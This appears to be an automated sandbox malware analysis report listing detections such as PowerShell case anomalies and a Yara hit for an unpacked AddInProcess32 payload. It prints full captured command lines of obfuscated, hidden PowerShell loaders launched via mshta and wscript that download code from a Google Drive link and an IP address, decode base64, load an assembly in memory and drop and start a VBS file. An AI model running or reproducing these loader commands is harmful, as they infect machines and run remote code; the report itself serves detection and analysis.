Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'\|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'\|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"			Jump to behavior

PowerShell case anomaly found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'\|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'\|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"	Jump to behavior

Yara detected aPLib compressed binary

Source: Yara match	File source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 1488, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline"
